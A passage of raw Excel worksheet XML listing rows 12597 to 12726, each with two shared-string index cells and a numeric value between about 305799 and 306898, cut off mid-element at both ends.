        <v>24939</v>
      </c>
      <c r="B12597" s="14" t="s">
        <v>14572</v>
      </c>
      <c r="C12597" s="15">
        <v>305799</v>
      </c>
    </row>
    <row r="12598" spans="1:3">
      <c r="A12598" s="28" t="s">
        <v>20067</v>
      </c>
      <c r="B12598" s="14" t="s">
        <v>9073</v>
      </c>
      <c r="C12598" s="15">
        <v>305800</v>
      </c>
    </row>
    <row r="12599" spans="1:3">
      <c r="A12599" s="28" t="s">
        <v>22616</v>
      </c>
      <c r="B12599" s="14" t="s">
        <v>11973</v>
      </c>
      <c r="C12599" s="15">
        <v>305810</v>
      </c>
    </row>
    <row r="12600" spans="1:3">
      <c r="A12600" s="28" t="s">
        <v>22617</v>
      </c>
      <c r="B12600" s="14" t="s">
        <v>11974</v>
      </c>
      <c r="C12600" s="15">
        <v>305820</v>
      </c>
    </row>
    <row r="12601" spans="1:3">
      <c r="A12601" s="28" t="s">
        <v>22618</v>
      </c>
      <c r="B12601" s="14" t="s">
        <v>11975</v>
      </c>
      <c r="C12601" s="15">
        <v>305850</v>
      </c>
    </row>
    <row r="12602" spans="1:3">
      <c r="A12602" s="28" t="s">
        <v>22619</v>
      </c>
      <c r="B12602" s="14" t="s">
        <v>14573</v>
      </c>
      <c r="C12602" s="15">
        <v>305851</v>
      </c>
    </row>
    <row r="12603" spans="1:3">
      <c r="A12603" s="28" t="s">
        <v>20068</v>
      </c>
      <c r="B12603" s="14" t="s">
        <v>11978</v>
      </c>
      <c r="C12603" s="15">
        <v>305853</v>
      </c>
    </row>
    <row r="12604" spans="1:3">
      <c r="A12604" s="28" t="s">
        <v>20069</v>
      </c>
      <c r="B12604" s="14" t="s">
        <v>9075</v>
      </c>
      <c r="C12604" s="15">
        <v>305854</v>
      </c>
    </row>
    <row r="12605" spans="1:3">
      <c r="A12605" s="28" t="s">
        <v>22621</v>
      </c>
      <c r="B12605" s="14" t="s">
        <v>11979</v>
      </c>
      <c r="C12605" s="15">
        <v>305855</v>
      </c>
    </row>
    <row r="12606" spans="1:3">
      <c r="A12606" s="28" t="s">
        <v>22622</v>
      </c>
      <c r="B12606" s="14" t="s">
        <v>11980</v>
      </c>
      <c r="C12606" s="15">
        <v>305856</v>
      </c>
    </row>
    <row r="12607" spans="1:3">
      <c r="A12607" s="28" t="s">
        <v>20070</v>
      </c>
      <c r="B12607" s="14" t="s">
        <v>9076</v>
      </c>
      <c r="C12607" s="15">
        <v>305857</v>
      </c>
    </row>
    <row r="12608" spans="1:3">
      <c r="A12608" s="28" t="s">
        <v>20071</v>
      </c>
      <c r="B12608" s="14" t="s">
        <v>11231</v>
      </c>
      <c r="C12608" s="15">
        <v>305858</v>
      </c>
    </row>
    <row r="12609" spans="1:3">
      <c r="A12609" s="28" t="s">
        <v>22623</v>
      </c>
      <c r="B12609" s="14" t="s">
        <v>9074</v>
      </c>
      <c r="C12609" s="15">
        <v>305859</v>
      </c>
    </row>
    <row r="12610" spans="1:3">
      <c r="A12610" s="28" t="s">
        <v>22624</v>
      </c>
      <c r="B12610" s="14" t="s">
        <v>11981</v>
      </c>
      <c r="C12610" s="15">
        <v>305862</v>
      </c>
    </row>
    <row r="12611" spans="1:3">
      <c r="A12611" s="28" t="s">
        <v>22625</v>
      </c>
      <c r="B12611" s="14" t="s">
        <v>11982</v>
      </c>
      <c r="C12611" s="15">
        <v>305863</v>
      </c>
    </row>
    <row r="12612" spans="1:3">
      <c r="A12612" s="28" t="s">
        <v>24940</v>
      </c>
      <c r="B12612" s="17" t="s">
        <v>14574</v>
      </c>
      <c r="C12612" s="15">
        <v>305867</v>
      </c>
    </row>
    <row r="12613" spans="1:3">
      <c r="A12613" s="28" t="s">
        <v>20073</v>
      </c>
      <c r="B12613" s="14" t="s">
        <v>14575</v>
      </c>
      <c r="C12613" s="15">
        <v>305869</v>
      </c>
    </row>
    <row r="12614" spans="1:3">
      <c r="A12614" s="28" t="s">
        <v>20074</v>
      </c>
      <c r="B12614" s="14" t="s">
        <v>9080</v>
      </c>
      <c r="C12614" s="15">
        <v>305874</v>
      </c>
    </row>
    <row r="12615" spans="1:3">
      <c r="A12615" s="28" t="s">
        <v>20075</v>
      </c>
      <c r="B12615" s="14" t="s">
        <v>11987</v>
      </c>
      <c r="C12615" s="15">
        <v>305875</v>
      </c>
    </row>
    <row r="12616" spans="1:3">
      <c r="A12616" s="28" t="s">
        <v>20076</v>
      </c>
      <c r="B12616" s="14" t="s">
        <v>9082</v>
      </c>
      <c r="C12616" s="15">
        <v>305877</v>
      </c>
    </row>
    <row r="12617" spans="1:3">
      <c r="A12617" s="28" t="s">
        <v>112</v>
      </c>
      <c r="B12617" s="14" t="s">
        <v>9036</v>
      </c>
      <c r="C12617" s="15">
        <v>305950</v>
      </c>
    </row>
    <row r="12618" spans="1:3">
      <c r="A12618" s="28" t="s">
        <v>112</v>
      </c>
      <c r="B12618" s="14" t="s">
        <v>9036</v>
      </c>
      <c r="C12618" s="15">
        <v>305951</v>
      </c>
    </row>
    <row r="12619" spans="1:3">
      <c r="A12619" s="28" t="s">
        <v>19913</v>
      </c>
      <c r="B12619" s="14" t="s">
        <v>8566</v>
      </c>
      <c r="C12619" s="15">
        <v>305952</v>
      </c>
    </row>
    <row r="12620" spans="1:3">
      <c r="A12620" s="28" t="s">
        <v>107</v>
      </c>
      <c r="B12620" s="14" t="s">
        <v>9072</v>
      </c>
      <c r="C12620" s="15">
        <v>305954</v>
      </c>
    </row>
    <row r="12621" spans="1:3">
      <c r="A12621" s="28" t="s">
        <v>20077</v>
      </c>
      <c r="B12621" s="14" t="s">
        <v>9083</v>
      </c>
      <c r="C12621" s="15">
        <v>305955</v>
      </c>
    </row>
    <row r="12622" spans="1:3">
      <c r="A12622" s="28" t="s">
        <v>20079</v>
      </c>
      <c r="B12622" s="14" t="s">
        <v>9085</v>
      </c>
      <c r="C12622" s="15">
        <v>305960</v>
      </c>
    </row>
    <row r="12623" spans="1:3">
      <c r="A12623" s="28" t="s">
        <v>24941</v>
      </c>
      <c r="B12623" s="14" t="s">
        <v>14576</v>
      </c>
      <c r="C12623" s="15">
        <v>306009</v>
      </c>
    </row>
    <row r="12624" spans="1:3">
      <c r="A12624" s="28" t="s">
        <v>137</v>
      </c>
      <c r="B12624" s="14" t="s">
        <v>9087</v>
      </c>
      <c r="C12624" s="15">
        <v>306020</v>
      </c>
    </row>
    <row r="12625" spans="1:3">
      <c r="A12625" s="28" t="s">
        <v>22631</v>
      </c>
      <c r="B12625" s="14" t="s">
        <v>11989</v>
      </c>
      <c r="C12625" s="15">
        <v>306024</v>
      </c>
    </row>
    <row r="12626" spans="1:3">
      <c r="A12626" s="28" t="s">
        <v>22632</v>
      </c>
      <c r="B12626" s="14" t="s">
        <v>14577</v>
      </c>
      <c r="C12626" s="15">
        <v>306029</v>
      </c>
    </row>
    <row r="12627" spans="1:3">
      <c r="A12627" s="28" t="s">
        <v>24942</v>
      </c>
      <c r="B12627" s="14" t="s">
        <v>14578</v>
      </c>
      <c r="C12627" s="15">
        <v>306032</v>
      </c>
    </row>
    <row r="12628" spans="1:3">
      <c r="A12628" s="28" t="s">
        <v>20140</v>
      </c>
      <c r="B12628" s="14" t="s">
        <v>14579</v>
      </c>
      <c r="C12628" s="15">
        <v>306040</v>
      </c>
    </row>
    <row r="12629" spans="1:3">
      <c r="A12629" s="28" t="s">
        <v>22633</v>
      </c>
      <c r="B12629" s="14" t="s">
        <v>11991</v>
      </c>
      <c r="C12629" s="15">
        <v>306055</v>
      </c>
    </row>
    <row r="12630" spans="1:3">
      <c r="A12630" s="28" t="s">
        <v>20087</v>
      </c>
      <c r="B12630" s="14" t="s">
        <v>8818</v>
      </c>
      <c r="C12630" s="15">
        <v>306062</v>
      </c>
    </row>
    <row r="12631" spans="1:3">
      <c r="A12631" s="28" t="s">
        <v>20089</v>
      </c>
      <c r="B12631" s="14" t="s">
        <v>9096</v>
      </c>
      <c r="C12631" s="15">
        <v>306064</v>
      </c>
    </row>
    <row r="12632" spans="1:3">
      <c r="A12632" s="28" t="s">
        <v>20090</v>
      </c>
      <c r="B12632" s="14" t="s">
        <v>9097</v>
      </c>
      <c r="C12632" s="15">
        <v>306065</v>
      </c>
    </row>
    <row r="12633" spans="1:3">
      <c r="A12633" s="28" t="s">
        <v>19665</v>
      </c>
      <c r="B12633" s="14" t="s">
        <v>8613</v>
      </c>
      <c r="C12633" s="15">
        <v>306070</v>
      </c>
    </row>
    <row r="12634" spans="1:3">
      <c r="A12634" s="28" t="s">
        <v>22634</v>
      </c>
      <c r="B12634" s="14" t="s">
        <v>11876</v>
      </c>
      <c r="C12634" s="15">
        <v>306076</v>
      </c>
    </row>
    <row r="12635" spans="1:3">
      <c r="A12635" s="28" t="s">
        <v>19741</v>
      </c>
      <c r="B12635" s="14" t="s">
        <v>8701</v>
      </c>
      <c r="C12635" s="15">
        <v>306080</v>
      </c>
    </row>
    <row r="12636" spans="1:3">
      <c r="A12636" s="28" t="s">
        <v>24943</v>
      </c>
      <c r="B12636" s="14" t="s">
        <v>14580</v>
      </c>
      <c r="C12636" s="15">
        <v>306090</v>
      </c>
    </row>
    <row r="12637" spans="1:3">
      <c r="A12637" s="28" t="s">
        <v>20092</v>
      </c>
      <c r="B12637" s="14" t="s">
        <v>9099</v>
      </c>
      <c r="C12637" s="15">
        <v>306100</v>
      </c>
    </row>
    <row r="12638" spans="1:3">
      <c r="A12638" s="28" t="s">
        <v>20093</v>
      </c>
      <c r="B12638" s="14" t="s">
        <v>14581</v>
      </c>
      <c r="C12638" s="15">
        <v>306110</v>
      </c>
    </row>
    <row r="12639" spans="1:3">
      <c r="A12639" s="28" t="s">
        <v>20094</v>
      </c>
      <c r="B12639" s="14" t="s">
        <v>9101</v>
      </c>
      <c r="C12639" s="15">
        <v>306111</v>
      </c>
    </row>
    <row r="12640" spans="1:3">
      <c r="A12640" s="28" t="s">
        <v>20095</v>
      </c>
      <c r="B12640" s="14" t="s">
        <v>9102</v>
      </c>
      <c r="C12640" s="15">
        <v>306113</v>
      </c>
    </row>
    <row r="12641" spans="1:3">
      <c r="A12641" s="28" t="s">
        <v>20094</v>
      </c>
      <c r="B12641" s="14" t="s">
        <v>9160</v>
      </c>
      <c r="C12641" s="15">
        <v>306116</v>
      </c>
    </row>
    <row r="12642" spans="1:3">
      <c r="A12642" s="28" t="s">
        <v>20099</v>
      </c>
      <c r="B12642" s="14" t="s">
        <v>9134</v>
      </c>
      <c r="C12642" s="15">
        <v>306120</v>
      </c>
    </row>
    <row r="12643" spans="1:3">
      <c r="A12643" s="28" t="s">
        <v>20100</v>
      </c>
      <c r="B12643" s="14" t="s">
        <v>14582</v>
      </c>
      <c r="C12643" s="15">
        <v>306123</v>
      </c>
    </row>
    <row r="12644" spans="1:3">
      <c r="A12644" s="28" t="s">
        <v>22635</v>
      </c>
      <c r="B12644" s="14" t="s">
        <v>11995</v>
      </c>
      <c r="C12644" s="15">
        <v>306124</v>
      </c>
    </row>
    <row r="12645" spans="1:3">
      <c r="A12645" s="28" t="s">
        <v>20101</v>
      </c>
      <c r="B12645" s="14" t="s">
        <v>14583</v>
      </c>
      <c r="C12645" s="15">
        <v>306127</v>
      </c>
    </row>
    <row r="12646" spans="1:3">
      <c r="A12646" s="28" t="s">
        <v>18878</v>
      </c>
      <c r="B12646" s="14" t="s">
        <v>14584</v>
      </c>
      <c r="C12646" s="15">
        <v>306140</v>
      </c>
    </row>
    <row r="12647" spans="1:3">
      <c r="A12647" s="28" t="s">
        <v>20102</v>
      </c>
      <c r="B12647" s="14" t="s">
        <v>9109</v>
      </c>
      <c r="C12647" s="15">
        <v>306141</v>
      </c>
    </row>
    <row r="12648" spans="1:3">
      <c r="A12648" s="28" t="s">
        <v>20103</v>
      </c>
      <c r="B12648" s="14" t="s">
        <v>9110</v>
      </c>
      <c r="C12648" s="15">
        <v>306143</v>
      </c>
    </row>
    <row r="12649" spans="1:3">
      <c r="A12649" s="28" t="s">
        <v>22636</v>
      </c>
      <c r="B12649" s="14" t="s">
        <v>14585</v>
      </c>
      <c r="C12649" s="15">
        <v>306146</v>
      </c>
    </row>
    <row r="12650" spans="1:3">
      <c r="A12650" s="28" t="s">
        <v>22637</v>
      </c>
      <c r="B12650" s="14" t="s">
        <v>14586</v>
      </c>
      <c r="C12650" s="15">
        <v>306150</v>
      </c>
    </row>
    <row r="12651" spans="1:3">
      <c r="A12651" s="28" t="s">
        <v>20106</v>
      </c>
      <c r="B12651" s="14" t="s">
        <v>14586</v>
      </c>
      <c r="C12651" s="15">
        <v>306153</v>
      </c>
    </row>
    <row r="12652" spans="1:3">
      <c r="A12652" s="28" t="s">
        <v>22635</v>
      </c>
      <c r="B12652" s="14" t="s">
        <v>9438</v>
      </c>
      <c r="C12652" s="15">
        <v>306154</v>
      </c>
    </row>
    <row r="12653" spans="1:3">
      <c r="A12653" s="28" t="s">
        <v>22638</v>
      </c>
      <c r="B12653" s="14" t="s">
        <v>11998</v>
      </c>
      <c r="C12653" s="15">
        <v>306160</v>
      </c>
    </row>
    <row r="12654" spans="1:3">
      <c r="A12654" s="28" t="s">
        <v>20107</v>
      </c>
      <c r="B12654" s="14" t="s">
        <v>14587</v>
      </c>
      <c r="C12654" s="15">
        <v>306161</v>
      </c>
    </row>
    <row r="12655" spans="1:3">
      <c r="A12655" s="28" t="s">
        <v>20095</v>
      </c>
      <c r="B12655" s="14" t="s">
        <v>9102</v>
      </c>
      <c r="C12655" s="15">
        <v>306163</v>
      </c>
    </row>
    <row r="12656" spans="1:3">
      <c r="A12656" s="28" t="s">
        <v>20108</v>
      </c>
      <c r="B12656" s="14" t="s">
        <v>9117</v>
      </c>
      <c r="C12656" s="15">
        <v>306166</v>
      </c>
    </row>
    <row r="12657" spans="1:3">
      <c r="A12657" s="28" t="s">
        <v>22639</v>
      </c>
      <c r="B12657" s="14" t="s">
        <v>11999</v>
      </c>
      <c r="C12657" s="15">
        <v>306170</v>
      </c>
    </row>
    <row r="12658" spans="1:3">
      <c r="A12658" s="28" t="s">
        <v>22635</v>
      </c>
      <c r="B12658" s="14" t="s">
        <v>9438</v>
      </c>
      <c r="C12658" s="15">
        <v>306174</v>
      </c>
    </row>
    <row r="12659" spans="1:3">
      <c r="A12659" s="28" t="s">
        <v>22640</v>
      </c>
      <c r="B12659" s="14" t="s">
        <v>12000</v>
      </c>
      <c r="C12659" s="15">
        <v>306180</v>
      </c>
    </row>
    <row r="12660" spans="1:3">
      <c r="A12660" s="28" t="s">
        <v>20110</v>
      </c>
      <c r="B12660" s="14" t="s">
        <v>14588</v>
      </c>
      <c r="C12660" s="15">
        <v>306181</v>
      </c>
    </row>
    <row r="12661" spans="1:3">
      <c r="A12661" s="28" t="s">
        <v>479</v>
      </c>
      <c r="B12661" s="14" t="s">
        <v>8572</v>
      </c>
      <c r="C12661" s="15">
        <v>306182</v>
      </c>
    </row>
    <row r="12662" spans="1:3">
      <c r="A12662" s="28" t="s">
        <v>22641</v>
      </c>
      <c r="B12662" s="14" t="s">
        <v>12001</v>
      </c>
      <c r="C12662" s="15">
        <v>306190</v>
      </c>
    </row>
    <row r="12663" spans="1:3">
      <c r="A12663" s="28" t="s">
        <v>22642</v>
      </c>
      <c r="B12663" s="14" t="s">
        <v>9058</v>
      </c>
      <c r="C12663" s="15">
        <v>306210</v>
      </c>
    </row>
    <row r="12664" spans="1:3">
      <c r="A12664" s="28" t="s">
        <v>20112</v>
      </c>
      <c r="B12664" s="14" t="s">
        <v>9122</v>
      </c>
      <c r="C12664" s="15">
        <v>306214</v>
      </c>
    </row>
    <row r="12665" spans="1:3">
      <c r="A12665" s="28" t="s">
        <v>19963</v>
      </c>
      <c r="B12665" s="14" t="s">
        <v>9060</v>
      </c>
      <c r="C12665" s="15">
        <v>306220</v>
      </c>
    </row>
    <row r="12666" spans="1:3">
      <c r="A12666" s="28" t="s">
        <v>22643</v>
      </c>
      <c r="B12666" s="14" t="s">
        <v>9168</v>
      </c>
      <c r="C12666" s="15">
        <v>306710</v>
      </c>
    </row>
    <row r="12667" spans="1:3">
      <c r="A12667" s="28" t="s">
        <v>20118</v>
      </c>
      <c r="B12667" s="14" t="s">
        <v>9129</v>
      </c>
      <c r="C12667" s="15">
        <v>306711</v>
      </c>
    </row>
    <row r="12668" spans="1:3">
      <c r="A12668" s="28" t="s">
        <v>24944</v>
      </c>
      <c r="B12668" s="14" t="s">
        <v>14589</v>
      </c>
      <c r="C12668" s="15">
        <v>306712</v>
      </c>
    </row>
    <row r="12669" spans="1:3">
      <c r="A12669" s="28" t="s">
        <v>24945</v>
      </c>
      <c r="B12669" s="14" t="s">
        <v>14590</v>
      </c>
      <c r="C12669" s="15">
        <v>306713</v>
      </c>
    </row>
    <row r="12670" spans="1:3">
      <c r="A12670" s="28" t="s">
        <v>24946</v>
      </c>
      <c r="B12670" s="14" t="s">
        <v>14591</v>
      </c>
      <c r="C12670" s="15">
        <v>306714</v>
      </c>
    </row>
    <row r="12671" spans="1:3">
      <c r="A12671" s="28" t="s">
        <v>24947</v>
      </c>
      <c r="B12671" s="14" t="s">
        <v>14592</v>
      </c>
      <c r="C12671" s="15">
        <v>306715</v>
      </c>
    </row>
    <row r="12672" spans="1:3">
      <c r="A12672" s="28" t="s">
        <v>24948</v>
      </c>
      <c r="B12672" s="14" t="s">
        <v>12035</v>
      </c>
      <c r="C12672" s="15">
        <v>306716</v>
      </c>
    </row>
    <row r="12673" spans="1:3">
      <c r="A12673" s="28" t="s">
        <v>24949</v>
      </c>
      <c r="B12673" s="14" t="s">
        <v>14593</v>
      </c>
      <c r="C12673" s="15">
        <v>306717</v>
      </c>
    </row>
    <row r="12674" spans="1:3">
      <c r="A12674" s="28" t="s">
        <v>24950</v>
      </c>
      <c r="B12674" s="14" t="s">
        <v>14594</v>
      </c>
      <c r="C12674" s="15">
        <v>306718</v>
      </c>
    </row>
    <row r="12675" spans="1:3">
      <c r="A12675" s="28" t="s">
        <v>20120</v>
      </c>
      <c r="B12675" s="14" t="s">
        <v>9131</v>
      </c>
      <c r="C12675" s="15">
        <v>306722</v>
      </c>
    </row>
    <row r="12676" spans="1:3">
      <c r="A12676" s="28" t="s">
        <v>20057</v>
      </c>
      <c r="B12676" s="14" t="s">
        <v>9058</v>
      </c>
      <c r="C12676" s="15">
        <v>306730</v>
      </c>
    </row>
    <row r="12677" spans="1:3">
      <c r="A12677" s="28" t="s">
        <v>20124</v>
      </c>
      <c r="B12677" s="14" t="s">
        <v>9135</v>
      </c>
      <c r="C12677" s="15">
        <v>306731</v>
      </c>
    </row>
    <row r="12678" spans="1:3">
      <c r="A12678" s="28" t="s">
        <v>24951</v>
      </c>
      <c r="B12678" s="14" t="s">
        <v>14595</v>
      </c>
      <c r="C12678" s="15">
        <v>306733</v>
      </c>
    </row>
    <row r="12679" spans="1:3">
      <c r="A12679" s="28" t="s">
        <v>24952</v>
      </c>
      <c r="B12679" s="14" t="s">
        <v>14596</v>
      </c>
      <c r="C12679" s="15">
        <v>306734</v>
      </c>
    </row>
    <row r="12680" spans="1:3">
      <c r="A12680" s="28" t="s">
        <v>24953</v>
      </c>
      <c r="B12680" s="14" t="s">
        <v>14597</v>
      </c>
      <c r="C12680" s="15">
        <v>306735</v>
      </c>
    </row>
    <row r="12681" spans="1:3">
      <c r="A12681" s="28" t="s">
        <v>24954</v>
      </c>
      <c r="B12681" s="14" t="s">
        <v>14598</v>
      </c>
      <c r="C12681" s="15">
        <v>306738</v>
      </c>
    </row>
    <row r="12682" spans="1:3">
      <c r="A12682" s="28" t="s">
        <v>24955</v>
      </c>
      <c r="B12682" s="14" t="s">
        <v>14599</v>
      </c>
      <c r="C12682" s="15">
        <v>306739</v>
      </c>
    </row>
    <row r="12683" spans="1:3">
      <c r="A12683" s="28" t="s">
        <v>22609</v>
      </c>
      <c r="B12683" s="14" t="s">
        <v>11967</v>
      </c>
      <c r="C12683" s="15">
        <v>306741</v>
      </c>
    </row>
    <row r="12684" spans="1:3">
      <c r="A12684" s="28" t="s">
        <v>20125</v>
      </c>
      <c r="B12684" s="14" t="s">
        <v>9136</v>
      </c>
      <c r="C12684" s="15">
        <v>306751</v>
      </c>
    </row>
    <row r="12685" spans="1:3">
      <c r="A12685" s="28" t="s">
        <v>24956</v>
      </c>
      <c r="B12685" s="14" t="s">
        <v>14600</v>
      </c>
      <c r="C12685" s="15">
        <v>306752</v>
      </c>
    </row>
    <row r="12686" spans="1:3">
      <c r="A12686" s="28" t="s">
        <v>24957</v>
      </c>
      <c r="B12686" s="14" t="s">
        <v>14601</v>
      </c>
      <c r="C12686" s="15">
        <v>306753</v>
      </c>
    </row>
    <row r="12687" spans="1:3">
      <c r="A12687" s="28" t="s">
        <v>24958</v>
      </c>
      <c r="B12687" s="14" t="s">
        <v>14602</v>
      </c>
      <c r="C12687" s="15">
        <v>306754</v>
      </c>
    </row>
    <row r="12688" spans="1:3">
      <c r="A12688" s="28" t="s">
        <v>24959</v>
      </c>
      <c r="B12688" s="14" t="s">
        <v>14603</v>
      </c>
      <c r="C12688" s="15">
        <v>306755</v>
      </c>
    </row>
    <row r="12689" spans="1:3">
      <c r="A12689" s="28" t="s">
        <v>24960</v>
      </c>
      <c r="B12689" s="14" t="s">
        <v>14604</v>
      </c>
      <c r="C12689" s="15">
        <v>306756</v>
      </c>
    </row>
    <row r="12690" spans="1:3">
      <c r="A12690" s="28" t="s">
        <v>24961</v>
      </c>
      <c r="B12690" s="14" t="s">
        <v>14605</v>
      </c>
      <c r="C12690" s="15">
        <v>306757</v>
      </c>
    </row>
    <row r="12691" spans="1:3">
      <c r="A12691" s="28" t="s">
        <v>20126</v>
      </c>
      <c r="B12691" s="14" t="s">
        <v>9137</v>
      </c>
      <c r="C12691" s="15">
        <v>306769</v>
      </c>
    </row>
    <row r="12692" spans="1:3">
      <c r="A12692" s="28" t="s">
        <v>22646</v>
      </c>
      <c r="B12692" s="14" t="s">
        <v>12004</v>
      </c>
      <c r="C12692" s="15">
        <v>306835</v>
      </c>
    </row>
    <row r="12693" spans="1:3">
      <c r="A12693" s="28" t="s">
        <v>22647</v>
      </c>
      <c r="B12693" s="14" t="s">
        <v>14606</v>
      </c>
      <c r="C12693" s="15">
        <v>306840</v>
      </c>
    </row>
    <row r="12694" spans="1:3">
      <c r="A12694" s="28" t="s">
        <v>22648</v>
      </c>
      <c r="B12694" s="14" t="s">
        <v>12006</v>
      </c>
      <c r="C12694" s="15">
        <v>306841</v>
      </c>
    </row>
    <row r="12695" spans="1:3">
      <c r="A12695" s="28" t="s">
        <v>22649</v>
      </c>
      <c r="B12695" s="14" t="s">
        <v>12007</v>
      </c>
      <c r="C12695" s="15">
        <v>306843</v>
      </c>
    </row>
    <row r="12696" spans="1:3">
      <c r="A12696" s="28" t="s">
        <v>22650</v>
      </c>
      <c r="B12696" s="14" t="s">
        <v>12005</v>
      </c>
      <c r="C12696" s="15">
        <v>306845</v>
      </c>
    </row>
    <row r="12697" spans="1:3">
      <c r="A12697" s="28" t="s">
        <v>22651</v>
      </c>
      <c r="B12697" s="14" t="s">
        <v>12008</v>
      </c>
      <c r="C12697" s="15">
        <v>306847</v>
      </c>
    </row>
    <row r="12698" spans="1:3">
      <c r="A12698" s="28" t="s">
        <v>22652</v>
      </c>
      <c r="B12698" s="14" t="s">
        <v>12009</v>
      </c>
      <c r="C12698" s="15">
        <v>306848</v>
      </c>
    </row>
    <row r="12699" spans="1:3">
      <c r="A12699" s="28" t="s">
        <v>22653</v>
      </c>
      <c r="B12699" s="14" t="s">
        <v>12010</v>
      </c>
      <c r="C12699" s="15">
        <v>306849</v>
      </c>
    </row>
    <row r="12700" spans="1:3">
      <c r="A12700" s="28" t="s">
        <v>20132</v>
      </c>
      <c r="B12700" s="14" t="s">
        <v>9143</v>
      </c>
      <c r="C12700" s="15">
        <v>306850</v>
      </c>
    </row>
    <row r="12701" spans="1:3">
      <c r="A12701" s="28" t="s">
        <v>20133</v>
      </c>
      <c r="B12701" s="14" t="s">
        <v>9144</v>
      </c>
      <c r="C12701" s="15">
        <v>306852</v>
      </c>
    </row>
    <row r="12702" spans="1:3">
      <c r="A12702" s="28" t="s">
        <v>20132</v>
      </c>
      <c r="B12702" s="14" t="s">
        <v>9143</v>
      </c>
      <c r="C12702" s="15">
        <v>306853</v>
      </c>
    </row>
    <row r="12703" spans="1:3">
      <c r="A12703" s="28" t="s">
        <v>22652</v>
      </c>
      <c r="B12703" s="14" t="s">
        <v>12009</v>
      </c>
      <c r="C12703" s="15">
        <v>306854</v>
      </c>
    </row>
    <row r="12704" spans="1:3">
      <c r="A12704" s="28" t="s">
        <v>22654</v>
      </c>
      <c r="B12704" s="14" t="s">
        <v>14607</v>
      </c>
      <c r="C12704" s="15">
        <v>306855</v>
      </c>
    </row>
    <row r="12705" spans="1:3">
      <c r="A12705" s="28" t="s">
        <v>19807</v>
      </c>
      <c r="B12705" s="14" t="s">
        <v>12092</v>
      </c>
      <c r="C12705" s="15">
        <v>306858</v>
      </c>
    </row>
    <row r="12706" spans="1:3">
      <c r="A12706" s="28" t="s">
        <v>20133</v>
      </c>
      <c r="B12706" s="14" t="s">
        <v>9144</v>
      </c>
      <c r="C12706" s="15">
        <v>306859</v>
      </c>
    </row>
    <row r="12707" spans="1:3">
      <c r="A12707" s="28" t="s">
        <v>20136</v>
      </c>
      <c r="B12707" s="14" t="s">
        <v>9147</v>
      </c>
      <c r="C12707" s="15">
        <v>306862</v>
      </c>
    </row>
    <row r="12708" spans="1:3">
      <c r="A12708" s="28" t="s">
        <v>22657</v>
      </c>
      <c r="B12708" s="14" t="s">
        <v>12014</v>
      </c>
      <c r="C12708" s="15">
        <v>306863</v>
      </c>
    </row>
    <row r="12709" spans="1:3">
      <c r="A12709" s="28" t="s">
        <v>22658</v>
      </c>
      <c r="B12709" s="14" t="s">
        <v>12015</v>
      </c>
      <c r="C12709" s="15">
        <v>306864</v>
      </c>
    </row>
    <row r="12710" spans="1:3">
      <c r="A12710" s="28" t="s">
        <v>22659</v>
      </c>
      <c r="B12710" s="14" t="s">
        <v>12016</v>
      </c>
      <c r="C12710" s="15">
        <v>306865</v>
      </c>
    </row>
    <row r="12711" spans="1:3">
      <c r="A12711" s="28" t="s">
        <v>22660</v>
      </c>
      <c r="B12711" s="14" t="s">
        <v>14608</v>
      </c>
      <c r="C12711" s="15">
        <v>306866</v>
      </c>
    </row>
    <row r="12712" spans="1:3">
      <c r="A12712" s="28" t="s">
        <v>22661</v>
      </c>
      <c r="B12712" s="14" t="s">
        <v>12018</v>
      </c>
      <c r="C12712" s="15">
        <v>306869</v>
      </c>
    </row>
    <row r="12713" spans="1:3">
      <c r="A12713" s="28" t="s">
        <v>20133</v>
      </c>
      <c r="B12713" s="14" t="s">
        <v>9144</v>
      </c>
      <c r="C12713" s="15">
        <v>306870</v>
      </c>
    </row>
    <row r="12714" spans="1:3">
      <c r="A12714" s="28" t="s">
        <v>22662</v>
      </c>
      <c r="B12714" s="14" t="s">
        <v>14609</v>
      </c>
      <c r="C12714" s="15">
        <v>306871</v>
      </c>
    </row>
    <row r="12715" spans="1:3">
      <c r="A12715" s="28" t="s">
        <v>22663</v>
      </c>
      <c r="B12715" s="14" t="s">
        <v>14610</v>
      </c>
      <c r="C12715" s="15">
        <v>306872</v>
      </c>
    </row>
    <row r="12716" spans="1:3">
      <c r="A12716" s="28" t="s">
        <v>22664</v>
      </c>
      <c r="B12716" s="14" t="s">
        <v>12021</v>
      </c>
      <c r="C12716" s="15">
        <v>306873</v>
      </c>
    </row>
    <row r="12717" spans="1:3">
      <c r="A12717" s="28" t="s">
        <v>22665</v>
      </c>
      <c r="B12717" s="14" t="s">
        <v>14611</v>
      </c>
      <c r="C12717" s="15">
        <v>306874</v>
      </c>
    </row>
    <row r="12718" spans="1:3">
      <c r="A12718" s="28" t="s">
        <v>22667</v>
      </c>
      <c r="B12718" s="14" t="s">
        <v>12024</v>
      </c>
      <c r="C12718" s="15">
        <v>306876</v>
      </c>
    </row>
    <row r="12719" spans="1:3">
      <c r="A12719" s="28" t="s">
        <v>22668</v>
      </c>
      <c r="B12719" s="14" t="s">
        <v>12025</v>
      </c>
      <c r="C12719" s="15">
        <v>306879</v>
      </c>
    </row>
    <row r="12720" spans="1:3">
      <c r="A12720" s="28" t="s">
        <v>22669</v>
      </c>
      <c r="B12720" s="14" t="s">
        <v>12026</v>
      </c>
      <c r="C12720" s="15">
        <v>306880</v>
      </c>
    </row>
    <row r="12721" spans="1:3">
      <c r="A12721" s="28" t="s">
        <v>22669</v>
      </c>
      <c r="B12721" s="14" t="s">
        <v>12026</v>
      </c>
      <c r="C12721" s="15">
        <v>306881</v>
      </c>
    </row>
    <row r="12722" spans="1:3">
      <c r="A12722" s="28" t="s">
        <v>19807</v>
      </c>
      <c r="B12722" s="14" t="s">
        <v>8772</v>
      </c>
      <c r="C12722" s="15">
        <v>306882</v>
      </c>
    </row>
    <row r="12723" spans="1:3">
      <c r="A12723" s="28" t="s">
        <v>22672</v>
      </c>
      <c r="B12723" s="14" t="s">
        <v>12029</v>
      </c>
      <c r="C12723" s="15">
        <v>306887</v>
      </c>
    </row>
    <row r="12724" spans="1:3">
      <c r="A12724" s="28" t="s">
        <v>22673</v>
      </c>
      <c r="B12724" s="14" t="s">
        <v>12030</v>
      </c>
      <c r="C12724" s="15">
        <v>306888</v>
      </c>
    </row>
    <row r="12725" spans="1:3">
      <c r="A12725" s="28" t="s">
        <v>18919</v>
      </c>
      <c r="B12725" s="14" t="s">
        <v>7337</v>
      </c>
      <c r="C12725" s="15">
        <v>306898</v>
      </c>
    </row>
    <row r="12726" spans="1:3">
      <c r="A12726" s="28" t="s">
        <v>22093</v>
      </c>
      <c r="B12726" s="14" t="s">
